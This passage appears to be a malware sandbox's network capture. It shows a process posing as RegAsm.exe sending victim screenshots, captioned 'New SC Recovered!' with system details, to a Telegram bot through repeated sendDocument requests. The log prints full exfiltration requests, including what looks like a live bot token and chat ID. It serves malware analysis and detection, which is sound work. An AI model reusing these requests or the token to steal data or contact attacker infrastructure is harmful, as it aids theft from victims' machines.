                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:07 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:07 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:07 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:07 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 36 30 32 63 36 34 65 62 36 66 33 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dca602c64eb6f3--
                                              2024-05-23 18:26:08 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:08 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":266,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488768,"document":{"file_name":"user-715575 2024-07-17 01-50-02.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEKZk-KQF-uDRwgAchYFj5ph0iuYv4AAsATAALx64FSD7h6nMZj4hgBAAdtAAM1BA","file_unique_id":"AQADwBMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEKZk-KQF-uDRwgAchYFj5ph0iuYv4AAsATAALx64FSD7h6nMZj4hgBAAdtAAM1BA","file_unique_id":"AQADwBMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBCmZPikBfrg0cIAHIWBY-aYdIrmL-AALAEwAC8euBUg-4epzGY-IYNQQ","file_unique_id":"AgADwBMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 07/17/2024 01:40:00\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.749729149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:13 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dca8e23f703ee1
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:26:13 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 38 65 32 33 66 37 30 33 65 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 38 65 32 33 66 37 30 33 65 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 30 2f 32 30 32 34 20 31 37 3a 32 34 3a 34 36 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dca8e23f703ee1Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dca8e23f703ee1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/20/2024 17:24:46User
                                              2024-05-23 18:26:13 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:13 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:13 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:13 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:13 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:13 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 38 65 32 33 66 37 30 33 65 65 31 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dca8e23f703ee1--
                                              2024-05-23 18:26:13 UTC25INHTTP/1.1 100 Continue


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.749730149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:14 UTC262OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcab1c436261e3
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              Connection: Keep-Alive
                                              2024-05-23 18:26:14 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 31 63 34 33 36 32 36 31 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 37 31 35 33 31 33 33 35 33 38 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 31 63 34 33 36 32 36 31 65 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 33 2f 32 30 32 34 20 31 33 3a 32 35 3a 30 30 0a 55 73 65 72
                                              Data Ascii: -----------------------------8dcab1c436261e3Content-Disposition: form-data; name="chat_id"7153133538-----------------------------8dcab1c436261e3Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/23/2024 13:25:00User
                                              2024-05-23 18:26:14 UTC16355OUTData Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22
                                              Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
                                              2024-05-23 18:26:14 UTC16355OUTData Raw: 3c 7b d7 28 27 99 61 68 44 ad e5 37 54 cf 07 f0 a8 ea e1 81 49 dd b1 d4 cc e5 25 68 c7 4b 05 14 51 5e 81 e4 85 14 51 40 09 5d 1f 85 27 86 18 ee bc d9 a3 8f 25 71 bd 80 cf 5f 5a e7 28 ac 6b d2 f6 b0 e5 bd 8e 9c 35 7f 61 53 9e d7 3d 0b ed f6 7f f3 f9 07 fd fd 5f f1 a4 fb 7d 97 fc fe 5b ff 00 df d5 ff 00 1a f3 ea 2b 8b fb 3f fb df 87 fc 13 d1 fe d6 fe e7 e3 ff 00 00 f4 1f b7 d9 7f cf e5 bf fd fd 5f f1 ae 3f 5f 92 39 75 89 de 27 57 43 b7 0c a7 20 fc a3 bd 67 51 5b 50 c2 7b 29 f3 73 5c e7 c4 e3 fd bc 39 39 6d f3 ff 00 80 14 51 45 76 9e 70 51 45 14 01 a5 e1 cf f9 0e db 7f c0 bf f4 13 5d d5 79 9d 26 07 a5 70 62 30 92 ab 3e 64 cf 53 0b 8e 8d 0a 7c 8d 5c f4 da 2b cc b0 3d 28 c0 f4 ac 3f b3 e5 fc c7 4f f6 ac 3f 95 9d cf 89 3f e4 05 71 ff 00 00 ff 00 d0 85 70 d4 62
                                              Data Ascii: <{('ahD7TI%hKQ^Q@]'%q_Z(k5aS=_}[+?_?_9u'WC gQ[P{)s\99mQEvpQE]y&pb0>dS|\+=(?O??qpb
                                              2024-05-23 18:26:14 UTC16355OUTData Raw: ec b7 3d 64 91 90 33 c9 ac c7 ff 00 51 ad 7f bc 7f f4 4a 57 1e da c5 cc d6 f6 97 22 53 f6 ab 13 83 93 c3 a1 ef fd 0f ae 45 74 d6 37 a9 a8 69 3a ad dc 60 aa c8 58 e0 f6 22 14 04 7e 62 b3 a9 87 95 28 b6 ff 00 ad 4d 29 e2 23 56 49 2f eb 43 96 a2 8a 5a f6 cf 94 12 8a 28 a0 0a 7a 9f fc 7b af fb e3 f9 1a d1 ff 00 84 7a da 4d 53 4c 8a 29 26 fb 2d dc 1e 73 33 30 dc b8 04 9e 71 8f 4a ce d4 ff 00 e3 dd 7f df 1f c8 d6 ee 9f a9 da af 84 4b c9 3c 62 f2 de 29 60 8d 0b 0d c7 79 1c 81 d7 d3 f2 ae 6a ee 4a ce 3e 87 b5 80 49 d3 d4 a8 de 1d b6 8b 56 d4 a1 96 59 7e c9 6b 6f e7 23 86 1b 9b 80 47 38 fa f6 ed 5a 9e 0c b8 16 de 1f 95 d9 e1 50 6e 88 cc d2 6c 1f 71 7b e0 f3 55 b5 0d 4e d1 fc 22 b2 24 d1 9b db 88 a2 b7 91 03 8d c0 21 3c 91 d7 9e 7f 31 53 78 44 ce 3c 39 2f 90 2e 4b
                                              Data Ascii: =d3QJW"SEt7i:`X"~b(M)#VI/CZ(z{zMSL)&-s30qJK<b)`yjJ>IVY~ko#G8ZPnlq{UN"$!<1SxD<9/.K
                                              2024-05-23 18:26:14 UTC15447OUTData Raw: 4f f8 46 ec 3f bd 37 fd f4 3f c2 b8 7e bd 4f b3 fe be 67 ab fd 95 5b ba fc 7f c8 e4 28 ae aa e3 c3 d6 31 5b cb 22 b4 d9 44 2c 32 c3 b0 fa 56 2e ab a6 bd 84 d9 19 68 5b ee b7 f4 35 a5 3c 5d 3a 92 e5 5a 18 d6 cb eb 51 8f 3b b3 5e 46 7d 14 51 5d 47 00 51 45 14 00 51 45 74 1e 1f d3 2c ef ac a5 96 e6 22 ee b2 95 07 7b 0e 30 0f 63 ef 58 d6 aa a8 c7 99 a3 a7 0d 87 78 89 b8 27 6d 2e 73 f4 57 69 fd 81 a5 ff 00 cf b1 ff 00 bf af fe 34 7f 60 69 7f f3 ec 7f ef eb ff 00 8d 72 fd 7e 3d 8e ff 00 ec 99 ff 00 32 38 ba 2b 47 50 d2 e4 b7 89 ee a1 05 ad fc d9 14 8e a6 3c 39 03 f0 e3 ad 67 57 55 2a d1 ab 1b c4 f3 f1 18 79 e1 e5 cb 20 a2 8a 2b 63 9c 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 29 29 69 28 18 51 45 14 00 51 45 14 00 94 51 45 00 14 51 45 00 14 51 45 03 0a 4a
                                              Data Ascii: OF?7?~Og[(1["D,2V.h[5<]:ZQ;^F}Q]GQEQEt,"{0cXx'm.sWi4`ir~=28+GP<9gWU*y +c(((())i(QEQEQEQEQEJ
                                              2024-05-23 18:26:14 UTC1355OUTData Raw: d4 9e ff 00 8d 61 d1 45 00 14 51 45 30 0a d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 59 14 52 03 4e 5d 72 fa 79 e1 9e e2 4f 3e 68 ad a4 b6 f3 25 2c cc ca e1 c1 24 93 c9 02 43 8f a0 ac ca 28 a0 02 8a 28 a0 02 ba e9 bc 63 15 cc 71 24 b6 8f 1f 96 b8 05 58 36 7f 96 3a 57 23 45 24 97 3a 9f 55 b0 3d 62 e3 d1 9d 94 de 36 86 78 bc a6 d3 4c 40 f5 75 90 31 fc b0 3f 9d 67 eb 3e 25 5d 47 48 5d 39 2d 99 55 5c 38 91 9b 93 8c f6 c7 bf ad 73 b4 56 71 a3 08 c5 41 2d 13 bf 5d ca 73 6e 5c dd 6d 60 a2 8a 2b 52 42 b7 b4 ad 59 04 4b 04 ed b1 97 85 6f 51 58 34 54 ca 2a 4a cc 89 c1 4d 59 9e 99 a6 ea 77 77 2d b5 ef 36 c0 83 2f 21 da 0e 3d 37 75 fd 6b 2b c5 5e 27 82 4b 57 b0 b0 90 48 64 18 92 45 e8 07 a0 f5 ae 22 8a e4 78 35 3a aa a5 47 7b 6c
                                              Data Ascii: aEQE0>qu,y_'8QYRN]ryO>h%,$C((cq$X6:W#E$:U=b6xL@u1?g>%]GH]9-U\8sVqA-]sn\m`+RBYKoQX4T*JMYww-6/!=7uk+^'KWHdE"x5:G{l
                                              2024-05-23 18:26:14 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 62 31 63 34 33 36 32 36 31 65 33 2d 2d 0d 0a
                                              Data Ascii: -----------------------------8dcab1c436261e3--
                                              2024-05-23 18:26:14 UTC25INHTTP/1.1 100 Continue
                                              2024-05-23 18:26:15 UTC1494INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 23 May 2024 18:26:15 GMT
                                              Content-Type: application/json
                                              Content-Length: 1105
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              {"ok":true,"result":{"message_id":268,"from":{"id":6814314158,"is_bot":true,"first_name":"oba","username":"ObaK_bot"},"chat":{"id":7153133538,"first_name":"KGB CRYPTO","username":"KGB_cryptor_admin","type":"private"},"date":1716488775,"document":{"file_name":"user-715575 2024-07-23 13-35-05.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAgEMZk-KR8FLydQ_kZsq8wL5YmvX_8oAAsITAALx64FSLTpO3dHr1REBAAdtAAM1BA","file_unique_id":"AQADwhMAAvHrgVJy","file_size":12368,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAgEMZk-KR8FLydQ_kZsq8wL5YmvX_8oAAsITAALx64FSLTpO3dHr1REBAAdtAAM1BA","file_unique_id":"AQADwhMAAvHrgVJy","file_size":12368,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAIBDGZPikfBS8nUP5GbKvMC-WJr1__KAALCEwAC8euBUi06Tt3R69URNQQ","file_unique_id":"AgADwhMAAvHrgVI","file_size":66312},"caption":"New SC Recovered!\n\nTime: 07/23/2024 13:25:00\nUser Name: user/715575\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Addr [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.749731149.154.167.2204435896C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                              TimestampBytes transferredDirectionData
                                              2024-05-23 18:26:17 UTC238OUTPOST /bot6814314158:AAEkRl6H9QdGzzoVC6YfWI-wFLiqXO8LEls/sendDocument HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=---------------------------8dcadba5a9e9843
                                              Host: api.telegram.org
                                              Content-Length: 66941
                                              Expect: 100-continue
                                              2024-05-23 18:26:17 UTC25INHTTP/1.1 100 Continue
